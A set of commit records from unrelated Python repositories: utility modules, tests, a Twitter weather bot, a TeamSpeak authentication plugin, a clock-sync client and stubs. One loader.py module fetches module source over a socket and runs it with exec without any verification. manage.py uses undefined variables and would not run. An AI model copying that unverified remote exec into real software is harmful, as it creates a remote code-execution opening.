57c29ec11b91505cade24670cc45726a8689bb9a | add needed util module | HERA-Team/hera_mc,HERA-Team/hera_mc,HERA-Team/Monitor_and_Control | hera_mc/cm_utils.py | hera_mc/cm_utils.py | # -*- mode: python; coding: utf-8 -*-
# Copyright 2016 the HERA Collaboration
# Licensed under the 2-clause BSD license.
"""Some dumb low-level configuration management utility functions.
"""
from __future__ import print_function
import datetime
def _get_datetime(_date,_time):
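    # Dates are "MM/DD/YY" (two-digit year offset from 2000), times are
    # "HH:MM"; the literal string "now" selects the current moment.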
    if _date.lower() == 'now':
        dt_d = datetime.datetime.now()
    else:
        data = _date.split('/')
        dt_d = datetime.datetime(int(data[2])+2000,int(data[0]),int(data[1]))
    if _time.lower() == 'now':
        dt_t = datetime.datetime.now()
    else:
        data = _time.split(':')
        dt_t = datetime.datetime(dt_d.year,dt_d.month,dt_d.day,int(data[0]),int(data[1]),0)
    dt = datetime.datetime(dt_d.year,dt_d.month,dt_d.day,dt_t.hour,dt_t.minute)
    return dt
def _get_stopdate(_stop_date):
    if _stop_date:
        return _stop_date
    else:
        return datetime.datetime(2020,12,31)
def _is_active(current, _start_date, _stop_date):
    _stop_date = _get_stopdate(_stop_date)
    if current > _start_date and current < _stop_date:
        is_active=True
    else:
        is_active=False
    return is_active
|
860b7b30f393622dac9badd15d65bf59679580e2 | Create utils.py | twitterdev/twitter-for-bigquery,atomicjets/twitter-for-bigquery,atomicjets/twitter-for-bigquery,twitterdev/twitter-for-bigquery,atomicjets/twitter-for-bigquery,twitterdev/twitter-for-bigquery | image_gnip/utils.py | image_gnip/utils.py | import os
import sys
import time
import logging.config
import json
class Utils:
    @staticmethod
    def insert_record(client, dataset_id, table_id, record):
        result = client.push_rows(dataset_id, table_id, [record], None)
        if result.get('insertErrors', None):
            print "Record: %s" % (json.dumps(record))
            print "Error result: %s" % result
            return False
        return True
    @staticmethod
    def import_from_file(client, dataset_id, table_id, filename, single_tweet=False):
        if single_tweet:
            record = json.loads(Utils.read_file(SAMPLE_TWEET_FILE))
            success = Utils.insert_record(client, dataset_id, table_id, record)
            return success
        row = 0
        with open(filename, "r") as f:
            for tweet in f:
                record = json.loads(tweet)
                # ignore delete records for now
                if record.get("delete", None):
                    continue
                record_scrubbed = Utils.scrub(record)
                success = Utils.insert_record(client, dataset_id, table_id, record_scrubbed)
                if not success:
                    print "Failed row: %s %s" % (row, json.dumps(record))
                    return
                else:
                    print "Processed row: %s" % row
                row = row + 1
    @staticmethod
    def scrub(d):
        # d.iteritems isn't used as you can't del or the iterator breaks.
        for key, value in d.items():
            if value is None:
                del d[key]
            elif key == 'coordinates':
                del d[key]
            elif key == 'attributes': # in 'place' object
                del d[key]
            elif key == 'bounding_box': # in 'place' object
                del d[key]
            elif key == 'retweeted_status':
                del d[key]
            elif key == 'created_at':
                d[key] = Utils.convert_timestamp(value)
            elif isinstance(value, dict):
                Utils.scrub(value)
        return d # For convenience
    @staticmethod
    def convert_timestamp(str):
        ts = time.strptime(str,'%a %b %d %H:%M:%S +0000 %Y')
        ts = time.strftime('%Y-%m-%d %H:%M:%S', ts)
        return ts
    @staticmethod
    def read_file(fn):
        data = ""
        with open(fn, "r") as f:
            for line in f:
                data = data + line
        return data
    @staticmethod
    def generate_schema_from_tweet():
        record_str = Utils.read_file(SAMPLE_TWEET_FILE)
        record = json.loads(record_str)
        schema_str = schema_from_record(record)
        return schema_str
    @staticmethod
    def enable_logging():
        LOGGING_CONFIG = os.path.join(os.path.dirname(__file__), "logging.conf")
        print "LOGGING_CONFIG" + str(LOGGING_CONFIG)
        logging.config.fileConfig(LOGGING_CONFIG)
        root = logging.getLogger("root")
        return root
| apache-2.0 | Python |
|
0080b6744b0ed9603ecf28b826e03aef01a58d2c | add editmate extension | danielballan/ipython_extensions,NunoEdgarGub1/ipython_extensions,minrk/ipython_extensions,dekstop/ipython_extensions,NunoEdgarGub1/ipython_extensions,minrk/ipython_extensions,dekstop/ipython_extensions,NunoEdgarGub1/ipython_extensions,danielballan/ipython_extensions,minrk/ipython_extensions,dekstop/ipython_extensions,danielballan/ipython_extensions | editmate.py | editmate.py | """
Use TextMate as the editor
Usage: %load_ext editmate
Now when you %edit something, it opens in textmate.
This is only necessary because the textmate command-line entrypoint
doesn't support the +L format for linenumbers, it uses `-l L`.
"""
from subprocess import Popen, list2cmdline
from IPython.core.error import TryNext
def edit_in_textmate(self, filename, linenum=None, wait=True):
    cmd = ['mate']
    if wait:
        cmd.append('-w')
    if linenum is not None:
        cmd.extend(['-l', str(linenum)])
    cmd.append(filename)
    proc = Popen(list2cmdline(cmd), shell=True)
    if wait and proc.wait() != 0:
        raise TryNext()
def load_ipython_extension(ip):
    ip.set_hook('editor', edit_in_textmate)
| bsd-3-clause | Python |
|
2ecf595b29b3b45769ab0934be6d095a4f80ad56 | Add mmtl unit teset | HazyResearch/metal,HazyResearch/metal | tests/metal/mmtl/test_mmtl.py | tests/metal/mmtl/test_mmtl.py | import unittest
from metal.mmtl.BERT_tasks import create_tasks
from metal.mmtl.metal_model import MetalModel
from metal.mmtl.trainer import MultitaskTrainer
class MMTLTest(unittest.TestCase):
    @classmethod
    def setUpClass(cls):
        task_names = [
            "COLA",
            "SST2",
            "MNLI",
            "RTE",
            "WNLI",
            "QQP",
            "MRPC",
            "STSB",
            "QNLI",
        ]
        cls.tasks = create_tasks(
            task_names, max_datapoints=100, dl_kwargs={"batch_size": 8}
        )
    def test_mmtl_training(self):
        model = MetalModel(self.tasks)
        trainer = MultitaskTrainer()
        trainer.train_model(
            model,
            self.tasks,
            checkpoint_metric="train/loss",
            checkpoint_metric_mode="min",
            n_epochs=1,
            verbose=False,
        )
| apache-2.0 | Python |
|
34b1eb53ffbca24a36c103f2017b8780405c48f4 | add prod wsgi to code | USStateDept/FPA_Core,nathanhilbert/FPA_Core,USStateDept/FPA_Core,nathanhilbert/FPA_Core,USStateDept/FPA_Core,nathanhilbert/FPA_Core | find.wsgi | find.wsgi | from openspending import core
application = core.create_web_app() | agpl-3.0 | Python |
|
59de1a12d44245b69ade0d4703c98bf772681751 | Add tests for User admin_forms | incuna/django-user-management,incuna/django-user-management | user_management/models/tests/test_admin_forms.py | user_management/models/tests/test_admin_forms.py | from django.core.exceptions import ValidationError
from django.test import TestCase
from .. import admin_forms
from . factories import UserFactory
class UserCreationFormTest(TestCase):
    def test_clean_email(self):
        email = '[email protected]'
        form = admin_forms.UserCreationForm()
        form.cleaned_data = {'email': email}
        self.assertEqual(form.clean_email(), email)
    def test_clean_duplicate_email(self):
        user = UserFactory.create()
        form = admin_forms.UserCreationForm()
        form.cleaned_data = {'email': user.email}
        with self.assertRaises(ValidationError):
            form.clean_email()
    def test_clean(self):
        data = {'password1': 'pass123', 'password2': 'pass123'}
        form = admin_forms.UserCreationForm()
        form.cleaned_data = data
        self.assertEqual(form.clean(), data)
    def test_clean_mismatched(self):
        data = {'password1': 'pass123', 'password2': 'pass321'}
        form = admin_forms.UserCreationForm()
        form.cleaned_data = data
        with self.assertRaises(ValidationError):
            form.clean()
class UserChangeFormTest(TestCase):
    def test_clean_password(self):
        password = 'pass123'
        data = {'password': password}
        user = UserFactory.build()
        form = admin_forms.UserChangeForm(data, instance=user)
        self.assertNotEqual(form.clean_password(), password)
|
706e8a6318b50466ee00ae51f59ec7ab76f820d6 | Create forecast.py | AJBBB/Turnkey-Twitter-WeatherBot,mattyk1985/Turnkey-Twitter-WeatherBot | forecast.py | forecast.py | # -*- coding: utf-8 -*-
# Weather Twitter Bot - AJBBB - 7/8/2015 v2.*
import urllib2
import json
from birdy.twitter import UserClient
import tweepy
#Twitter Keys
CONSUMER_KEY = "YOUR CONSUMER KEY HERE"
CONSUMER_SECRET = "YOUR CONSUMER SECRET HERE"
ACCESS_TOKEN = "YOUR ACCESS TOKEN HERE"
ACCESS_TOKEN_SECRET = "YOUR ACCESS TOKEN SECRET"
#Get the wundergound json file to be read
f = urllib2.urlopen("http://api.wunderground.com/api/YOUR-WUNDERGROUND-API-KEY-HERE/geolookup/conditions/q/GB/London.json")
#read from the json file
json_string = f.read()
#parse the json file
parsed_json = json.loads(json_string)
#get info from current_observation in json file
temp_c = parsed_json['current_observation']['temp_c']
wind = parsed_json['current_observation']['wind_kph']
winddir = parsed_json['current_observation']['wind_dir']
windstr = parsed_json['current_observation']['wind_string']
weather = parsed_json['current_observation']['weather']
#Define the degree symbol
degree = u'\N{DEGREE SIGN}'
#Connect Using Tweepy
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)
api = tweepy.API(auth)
#oAuth Client Info
client = UserClient(CONSUMER_KEY,
                    CONSUMER_SECRET,
                    ACCESS_TOKEN,
                    ACCESS_TOKEN_SECRET)
def tweet(message):
    #Simple tweet function to tweet whatever is passed to message.
    client.api.statuses.update.post(status=message)
if wind > 0.0:
    #Tweet out the current weather with numerical wind speed.
    tweet("Current weather in London, UK: " + str(temp_c) +
          degree + "C" + " and " + str(weather) + ". Wind: " + str(wind) +
          " KPH #weather #london #news #UK http://is.gd/UyLFWz")
else:
    #Tweet out the current weather with text.
    tweet("Current weather in London, UK: " + str(temp_c) +
          degree + "C" + " and " + str(weather) +
          ". Little to no wind. #weather #london #news #UK http://is.gd/UyLFWz")
| mit | Python |
|
ae1aaaddb8adbbe4167e9b2a073493df90f6fd60 | Remove unused CACHE_VERSION | hpsbranco/subliminal,neo1691/subliminal,juanmhidalgo/subliminal,Elettronik/subliminal,ofir123/subliminal,fernandog/subliminal,h3llrais3r/subliminal,SickRage/subliminal,Diaoul/subliminal | subliminal/cache.py | subliminal/cache.py | # -*- coding: utf-8 -*-
import datetime
from dogpile.cache import make_region
#: Expiration time for show caching
SHOW_EXPIRATION_TIME = datetime.timedelta(weeks=3).total_seconds()
#: Expiration time for episode caching
EPISODE_EXPIRATION_TIME = datetime.timedelta(days=3).total_seconds()
region = make_region()
| # -*- coding: utf-8 -*-
import datetime
from dogpile.cache import make_region
#: Subliminal's cache version
CACHE_VERSION = 1
#: Expiration time for show caching
SHOW_EXPIRATION_TIME = datetime.timedelta(weeks=3).total_seconds()
#: Expiration time for episode caching
EPISODE_EXPIRATION_TIME = datetime.timedelta(days=3).total_seconds()
region = make_region()
| mit | Python |
1d5227941c4839ff781fb944f425865b8afdc01f | Add lc0732_my_calendar_iii.py | bowen0701/algorithms_data_structures | lc0732_my_calendar_iii.py | lc0732_my_calendar_iii.py | """Leetcode 732. My Calendar III
Hard
URL: https://leetcode.com/problems/my-calendar-iii/
Implement a MyCalendarThree class to store your events. A new event can always be added.
Your class will have one method, book(int start, int end). Formally, this represents a
booking on the half open interval [start, end), the range of real numbers x such that
start <= x < end.
A K-booking happens when K events have some non-empty intersection (ie., there is some
time that is common to all K events.)
For each call to the method MyCalendar.book, return an integer K representing the
largest integer such that there exists a K-booking in the calendar.
Your class will be called like this:
MyCalendarThree cal = new MyCalendarThree();
MyCalendarThree.book(start, end)
Example 1:
MyCalendarThree();
MyCalendarThree.book(10, 20); // returns 1
MyCalendarThree.book(50, 60); // returns 1
MyCalendarThree.book(10, 40); // returns 2
MyCalendarThree.book(5, 15); // returns 3
MyCalendarThree.book(5, 10); // returns 3
MyCalendarThree.book(25, 55); // returns 3
Explanation:
The first two events can be booked and are disjoint, so the maximum K-booking is a 1-booking.
The third event [10, 40) intersects the first event, and the maximum K-booking is a 2-booking.
The remaining events cause the maximum K-booking to be only a 3-booking.
Note that the last event locally causes a 2-booking, but the answer is still 3 because
eg. [10, 20), [10, 40), and [5, 15) are still triple booked.
Note:
- The number of calls to MyCalendarThree.book per test case will be at most 400.
- In calls to MyCalendarThree.book(start, end), start and end are integers in the range [0, 10^9].
"""
class MyCalendarThree(object):
    def __init__(self):
        pass
    def book(self, start, end):
        """
        :type start: int
        :type end: int
        :rtype: int
        """
        pass
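        # Sweep-line sketch of one standard approach: keep a sorted map of
        # boundary deltas (+1 at each start, -1 at each end); the maximum
        # prefix sum over the sorted boundaries is K.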
def main():
    pass
if __name__ == '__main__':
    main()
| bsd-2-clause | Python |
|
5dc8e70bc081646fdeb37e9af1090a78e016d91b | add script inserting initial datas in selected database | Tisseo/TID,Tisseo/TID | insert_initial_datas.py | insert_initial_datas.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import psycopg2
import sys
import argparse
POSTGRESQL_connection = u"host='localhost' port=5432 user='postgres' password='postgres'"
def main():
    parser = argparse.ArgumentParser(description="Script d'insertion des données initiales d'une base ENDIV.")
    parser.add_argument("database", help="Spécifie le nom de la base de données")
    args = parser.parse_args()
    try:
        connection_string = POSTGRESQL_connection
        connection_string += u"dbname='{0}'".format(args.database)
        connection = psycopg2.connect(connection_string)
    except psycopg2.Error as e:
        print u"connection à la base de données impossible {0}".format(e)
        sys.exit(1)
    query = ''
    try:
        cursor = connection.cursor()
        try:
            cursor.execute(open("insert_initial_data.sql", "r").read())
            cursor.execute("COMMIT")
        except psycopg2.Error, e:
            print "error while inserting initial datas: {0}".format(e)
            sys.exit(1)
    finally:
        if cursor:
            cursor.close()
        if connection:
            connection.close()
    print u'insertions OK'
    sys.exit(0)
if __name__ == "__main__":
    main()
| agpl-3.0 | Python |
|
2aa90b34951bde36696bbcb773940a6adc245f23 | Add Authenticater plugin | HWDexperte/ts3observer | plugins/Authenticater.py | plugins/Authenticater.py | from ts3observer.models import Plugin, Action
import MySQLdb
class Meta:
    author_name = 'Tim Fechner'
    author_email = '[email protected]'
    version = '1.0'
class Config:
    enable = False
    interval = 5
    yaml = {
        'general': {
            'servergroup_id': 0,
            'remove_if_deleted': True,
        },
        'database': {
            'hostname': 'localhost',
            'username': '',
            'password': '',
            'database': '',
            'table': '',
        },
    }
class Authenticater(Plugin):
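    # Grants the configured servergroup to clients whose unique id is marked
    # active in the database, and removes it from everyone else.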
    def setup(self):
        self.connection = MySQLdb.connect(
            host=self.config['database']['hostname'],
            user=self.config['database']['username'],
            passwd=self.config['database']['password'],
            db=self.config['database']['database']
        )
        self.cursor = self.connection.cursor(MySQLdb.cursors.DictCursor)
    def run(self, clients, channels, server_info):
        auth_list = self.get_authenticated_users()
        for clid, client in clients.items():
            if (client.unique_identifier, True) in auth_list:
                if not self.already_has_group(client):
                    self.add_group(client)
            else:
                if self.already_has_group(client):
                    self.remove_group(client)
    def get_authenticated_users(self):
        self.cursor.execute('''SELECT ts3o_uid, ts3o_active FROM {}'''.format(self.config['database']['table']))
        self.connection.commit()
        users = self.cursor.fetchall()
        return [(pair['ts3o_uid'], bool(pair['ts3o_active'])) for pair in users]
    def already_has_group(self, client):
        for group in client.servergroups:
            if group == self.config['general']['servergroup_id']:
                return True
        return False
    def add_group(self, client):
        self._register_action(client, 'add')
    def remove_group(self, client):
        self._register_action(client, 'remove')
    def shutdown(self):
        self.connection.close()
    def _register_action(self, client, atype):
        Action(
            'Authenticater',
            ts3o.run_id,
            client,
            '{}_group'.format(atype),
            function_kwargs = {
                'servergroup_id': self.config['general']['servergroup_id'],
            },
            reason=atype
        ).register()
| mit | Python |
|
571dbf74bfc9f893d25ad7d626de800b2b3d6c73 | move load document functionality to deserializer. prepare for post/put methods | pavlov99/jsonapi,pavlov99/jsonapi | jsonapi/deserializer.py | jsonapi/deserializer.py | """ Deserializer definition."""
class DeserializerMeta(object):
    pass
class Deserializer(object):
    Meta = DeserializerMeta
    @classmethod
    def load_document(cls, document):
        """ Given document get model.
        :param dict document: Document
        :return django.db.models.Model model: model instance
        """
        pass
| mit | Python |
|
6537dc8853bb7f8d9fb93b0fb2b1c0241bb08b6b | Create client.py | suvrat-joshi/Mininet-Implementation-of-Cristian-s-Algorithm | python-scripts/client.py | python-scripts/client.py | import socket
from datetime import datetime, time
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) # create a client socket
port=9999
# get the current date-time
time1=datetime.now()
s.connect(("10.0.0.2", port)) # connect to server socket which is at address 10.0.0.2 and port 9999
tm=s.recv(1024) # this will read atmost 1024 bytes
# get the current date-time (after receiving current time from server)
time2=datetime.now()
serverTime=datetime.strptime(tm, "%Y-%m-%d %H:%M:%S.%f")
# terminate client socket
s.close()
# printing out time received from the time-server in console
print("The time got from the server is: \n")
print "Hour: %d \n" % serverTime.hour
print "Minute: %d \n" % serverTime.minute
print "Second: %d \n" % serverTime.second
print "Microsecond: %d \n" %serverTime.microsecond
# Applying Cristian`s algorithm
t1=time1.second*1000000+time1.microsecond
t2=time2.second*1000000+time2.microsecond
diff=(t2-t1)/2
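# Cristian's algorithm assumes symmetric network delay: the server's reading
# corresponds to the midpoint of the round trip, so half the measured
# round-trip time is added to the received timestamp.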
# computed value of actual micro-sec time to be added to obtained server time
newMicro = serverTime.microsecond+diff
# printing out actual time in console after application of Cristian`s algorithm
print("Applying Cristian`s algorithm the actual time is: \n")
print "Hour: %d \n" % serverTime.hour
print "Minute: %d \n" % serverTime.minute
print "Second: %d \n" % serverTime.second
print "Microsecond: %d \n" % newMicro
| apache-2.0 | Python |
|
bae50495106ce5c9cb39143a58e0e73a4e823d29 | Implement DispatchLoader (metapath import hook) | joushou/dispatch,joushou/dispatch | loader.py | loader.py | from __future__ import print_function, absolute_import, unicode_literals, division
from stackable.stack import Stack
from stackable.utils import StackablePickler
from stackable.network import StackableSocket, StackablePacketAssembler
from sys import modules
from types import ModuleType
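# PEP 302-style meta_path import hook: module source is fetched over a
# pickle-over-socket stack and exec'd into a fresh module object.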
class DispatchLoader(object):
    def __init__(self, ip, port):
        self.stack = Stack((StackableSocket(ip=ip, port=port),
                            StackablePacketAssembler(),
                            StackablePickler()))
        self.cache = {}
    def get_module(self, name):
        if name in self.cache:
            return self.cache[name]
        else:
            self.stack.write({'load': name})
            o = self.stack.read()
            if o['module'] != None:
                self.cache[name] = o['module']
            return o['module']
    def find_module(self, fullname, path=None):
        if self.get_module(fullname) != None:
            self.path = path
            return self
        return None
    def load_module(self, name):
        if name in modules:
            return modules[name]
        m = ModuleType(name, name)
        modules[name] = m
        mod = self.get_module(name)
        if mod == None:
            raise ImportError("No such module")
        exec mod in m.__dict__
        return m
| mit | Python |
|
0f79cf1d15292476f2bead6d85d15e6f0db6ebbf | Revert "Remove manage.py in the root" | LabD/wagtail-personalisation,LabD/wagtail-personalisation,LabD/wagtail-personalisation | manage.py | manage.py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tests.sandbox.settings")
    try:
        from django.core.management import execute_from_command_line
    except ImportError:
        # The above import may fail for some other reason. Ensure that the
        # issue is really that Django is missing to avoid masking other
        # exceptions on Python 2.
        try:
            import django
        except ImportError:
            raise ImportError(
                "Couldn't import Django. Are you sure it's installed and "
                "available on your PYTHONPATH environment variable? Did you "
                "forget to activate a virtual environment?"
            )
        raise
    execute_from_command_line(sys.argv)
| mit | Python |
|
77e13247b63af4dc2355bab2fdc64e2b38ec777a | Create manage.py | tnkteja/blockchained | manage.py | manage.py | #!/usr/bin/python
import argparse
from json import dump, load
from os import remove, rename, system
parser = argparse.ArgumentParser(description='This tool is Chaincode Development Manager.')
parser.add_argument("--init", action="store_true",help="Initialise the Chaincode environment")
# parser.add_argument('integers', metavar='N', type=int, nargs='+', help='an integer for the accumulator')
# parser.add_argument('--bootstrap', dest='bootstrap', action='store_const', const=sum, default=max, help='sum the integers (default: find the max)')
args = parser.parse_args()
############################### UTILS #############################
def bash(cmd):
    print '\n'+'%'*32,"BASHING-BEGINS-HERE",'%'*32,'\n'
    print "Command: ",cmd,'\n'
    print "Output:\n"
    system(cmd)
    print '\n'
    print '%'*32,"BASHING-ENDS-HERE",'%'*32,'\n'
####################################################################
specification_template={
"specification":{
"participants":[],
"ccis": {
"init": {
},
"invoke": {
},
"query": {
}
},
"models": {
}
},
"hashes": {
"specification":'',
"entities.go":'',
"ccis.go":''
}
}
init=False
if args.init:
    name=raw_input()
    author=raw_input()
    with open("specification.json","w") as f:
        dump(specification_template,f)
specification=None
# hashes=None
# with open("specification.json","r") as f:
# dic=load(f)
# specification=dic["specification"]
# hashes=dic["hashes"]
generate=False
if generate:
    pass
struct="""\
type %s struct {
%s
}
"""
# with open("tmp_entities.go","w") as f:
# print >> f, "package main\n"
# for entity,attributes in models.items():
# print >> f, struct%(entity,'')
# for file in ["tmp_entities.go"]:
# system("gofmt "+file)
# remove(file[4:])
# rename(file,file[4:])
#setup=True
if setup:
#build=True
if build:
print "You know this is not really required, but just running for Knitty Gritty."
bash("go tool fix -r .")
#test=True
if test:
print "Starting Unittests."
bash("go test -v")
print "Generating Test Coverage reports."
bash("go tool cover -html=count.out -o test/coverage.html")
browser=''
bash(browser+" test/coverage.out")
credits=True
if credits:
print """\
##########################################################################
################ HYPERLEDGER CHAINCODE DEVLOPMENT MANAGER ################
##########################################################################
Author: Neela Krishna Teja Tadikonda
Thanks to my team for the procurement project for the support and encouragement.
*
*
*
*
*
*
*
*
*
*
*
*
*
*
Finally special thanks to itpc - Mohan (CTO) and Sai (CEO) for supporting and encouraging me with the development of this tool.
"""
| mit | Python |
|
540ab945736486ce78452750486ea73128b29d7b | Add parse_xml.py | jg1141/revealjs_with_speech,jg1141/revealjs_with_speech,jg1141/revealjs_with_speech | parse_xml.py | parse_xml.py | import sys
import os
from bs4 import BeautifulSoup
from zipfile import ZipFile
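# An OpenDocument presentation is a zip archive; the slide notes live in
# content.xml as <draw:frame presentation:class="notes"> elements.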
def main(argv):
    root, ext = os.path.splitext(argv[1])
    with ZipFile(argv[1]) as myzip:
        with myzip.open("content.xml") as f:
            soup = BeautifulSoup(f.read(), "lxml")
    # print(soup)
    notes = soup.findAll("draw:frame", {"presentation:class": "notes"})
    with open("{}.script.txt".format(root), "w") as f:
        for index, note in enumerate(notes):
            bits = note.findAll("text:s")
            for bit in bits:
                note.find("text:s").replace_with(" ")
            print("_Slide {}".format(index))
            f.write("_Slide {}\n".format(index))
            print(note.text)
            f.write("{}\n".format(note.text))
if __name__ == "__main__":
    main(sys.argv)
| mit | Python |
|
269b779fe560fb85ca527cdda2ebd4e5e9b3a89c | Add monkeyrunner script to common operations | Miliox/droid_emc2,Miliox/droid_emc2,Miliox/droid_emc2,Miliox/droid_emc2,Miliox/droid_emc2 | monkey/common.py | monkey/common.py | from com.android.monkeyrunner import MonkeyDevice as mkd
from com.android.monkeyrunner import MonkeyRunner as mkr
_ddmm_pkg = 'br.ufpe.emilianofirmino.ddmm'
def open_dev():
"""Estabilish a MonkeyDevice connection to android"""
return mkr.waitForConnection(1000)
def open_app(device, package, activity = '.MainActivity'):
"""Launch activity on device specified by package[, activity]"""
app = package + '/' + activity
device.startActivity(component=app)
def press_back(device):
"""Press back button on device"""
device.press('KEYCODE_BACK', mkd.DOWN_AND_UP)
def lock_screen(device):
"""Lock device"""
device.press('KEYCODE_POWER', mkd.DOWN_AND_UP)
def unlock_screen(device):
"""Unlock device"""
device.wake()
(x1, x2, y) = (768/2, 50, 1000)
device.drag((x1,y), (x2,y), duration=1.0, steps=50)
def start_ddmm(device):
"""Start DDMM Profiler"""
open_app(device, _ddmm_pkg)
mkr.sleep(2)
device.touch(20, 200, mkd.DOWN_AND_UP) # check prevent sleep
device.touch(384, 300, mkd.DOWN_AND_UP) # start ddmm
mkr.sleep(2)
press_back(device) # close app
def stop_ddmm(device):
"""Stop DDMM Profiler"""
open_app(device, _ddmm_pkg)
mkr.sleep(2)
device.touch(384, 300, mkd.DOWN_AND_UP) # stop ddmm
press_back(device) # close app
| mit | Python |
|
e0d075661677b4b02fa29d108472e80b9fbcad02 | Add quote fixture | Neetuj/softlayer-python,allmightyspiff/softlayer-python,kyubifire/softlayer-python,underscorephil/softlayer-python,briancline/softlayer-python,softlayer/softlayer-python,nanjj/softlayer-python,skraghu/softlayer-python,cloudify-cosmo/softlayer-python,iftekeriba/softlayer-python | SoftLayer/testing/fixtures/Billing_Order_Quote.py | SoftLayer/testing/fixtures/Billing_Order_Quote.py | getObject = {
    'accountId': 1234,
    'id': 1234,
    'name': 'TestQuote1234',
    'quoteKey': '1234test4321',
}
getRecalculatedOrderContainer = {
    'orderContainers': [{
        'presetId': '',
        'prices': [{
            'id': 1921
        }],
        'quantity': 1,
        'packageId': 50,
        'useHourlyPricing': '',
    }],
}
| mit | Python |
|
07b6e59a5c7f581bd3e67f6ce254a8388e8b97e1 | add test | nakagami/minitds | minitds/test_minitds.py | minitds/test_minitds.py | #!/usr/bin/env python3
##############################################################################
# The MIT License (MIT)
#
# Copyright (c) 2016 Hajime Nakagami
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
##############################################################################
import unittest
import minitds
class TestMiniTds(unittest.TestCase):
host = 'localhost'
user = 'sa'
password = 'secret'
database = 'test'
def setUp(self):
self.connection = minitds.connect(
host=self.host,
user=self.user,
password=self.password,
database=self.database,
port=14333,
)
def tearDown(self):
self.connection.close()
    def test_basic(self):
        cur = self.connection.cursor()
        cur.execute("select 1 n, @@version version")
        row = cur.fetchone()
        self.assertEqual(row[0], 1)  # check the result instead of only running execute
if __name__ == "__main__":
unittest.main()
| mit | Python |
|
9b7817e4c4583ddecf2586b595bce9e2e126f4f0 | Add test for image.py | karlch/vimiv,karlch/vimiv,karlch/vimiv | tests/image_test.py | tests/image_test.py | #!/usr/bin/env python
# encoding: utf-8
from unittest import main
from vimiv_testcase import VimivTestCase
class ImageTest(VimivTestCase):
"""Image mode Test."""
@classmethod
def setUpClass(cls):
cls.init_test(cls, ["vimiv/testimages/arch_001.jpg"])
cls.image = cls.vimiv["image"]
def test_zoom_percent(self):
"""Test getting the fitting image zoom."""
# Panorama image
width = 1920
im_width = self.image.imsize[0]
perc = self.image.get_zoom_percent_to_fit()
self.assertEqual(im_width/width, perc)
def test_zooming(self):
"""Zooming of images."""
width = 1920
# Zoom in by 30 %
perc_before = self.image.zoom_percent
self.image.zoom_delta(0.3)
self.assertEqual(self.image.zoom_percent, perc_before * 1.3)
# Zoom to a size representing half the image size
self.image.zoom_to(0.5)
self.assertEqual(self.image.zoom_percent, 0.5)
pixbuf = self.image.image.get_pixbuf()
self.assertEqual(width * 0.5, pixbuf.get_width())
# Zoom by keyhandler
self.vimiv["keyhandler"].num_str = "03"
self.image.zoom_to(0)
self.assertEqual(self.image.zoom_percent, 1/3)
pixbuf = self.image.image.get_pixbuf()
self.assertEqual(width * (1/3), pixbuf.get_width())
# Zoom back to fit
self.image.zoom_to(0)
self.assertEqual(self.image.zoom_percent,
self.image.get_zoom_percent_to_fit())
pixbuf = self.image.image.get_pixbuf()
self.assertEqual(width * self.image.get_zoom_percent_to_fit(),
pixbuf.get_width())
# Unreasonable zoom
self.image.zoom_to(1000)
message = self.vimiv["statusbar"].left_label.get_text()
self.assertEqual(message, "Warning: Object cannot be zoomed (further)")
pixbuf = self.image.image.get_pixbuf()
self.assertEqual(width * self.image.get_zoom_percent_to_fit(),
pixbuf.get_width())
# Non parseable percentage
self.vimiv["keyhandler"].num_str = "vimiv"
self.image.zoom_to(0)
message = self.vimiv["statusbar"].left_label.get_text()
self.assertEqual(message, "Error: Zoom percentage not parseable")
def test_move(self):
"""Move from image to image."""
self.assertEqual(0, self.vimiv.index)
self.image.move_index()
self.assertEqual(1, self.vimiv.index)
self.image.move_index(forward=False)
self.assertEqual(0, self.vimiv.index)
self.image.move_index(delta=2)
self.assertEqual(2, self.vimiv.index)
self.image.move_pos()
self.assertEqual(len(self.vimiv.paths) - 1, self.vimiv.index)
self.image.move_pos(forward=False)
self.assertEqual(0, self.vimiv.index)
def test_toggles(self):
"""Toggle image.py settings."""
# Rescale svg
before = self.image.rescale_svg
self.image.toggle_rescale_svg()
self.assertFalse(before == self.image.rescale_svg)
self.image.toggle_rescale_svg()
self.assertTrue(before == self.image.rescale_svg)
# Overzoom
before = self.image.overzoom
self.image.toggle_overzoom()
self.assertFalse(before == self.image.overzoom)
self.image.toggle_overzoom()
self.assertTrue(before == self.image.overzoom)
# Animations should be tested in animation_test.py
def test_check_for_edit(self):
"""Check if an image was edited."""
path = self.vimiv.paths[self.vimiv.index]
self.assertEqual(0, self.image.check_for_edit(False))
self.vimiv.paths[self.vimiv.index] = "some-EDIT.jpg"
self.assertEqual(1, self.image.check_for_edit(False))
self.assertEqual(0, self.image.check_for_edit(True))
# Reset path
self.vimiv.paths[self.vimiv.index] = path
if __name__ == '__main__':
main()
| mit | Python |
|
a13ee62b02d3fe1958f2cbecd903c3e8b32562da | Add dummy test file #2 | 7pairs/kac6vote | tests/test_dummy.py | tests/test_dummy.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2017 Jun-ya HASEBA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
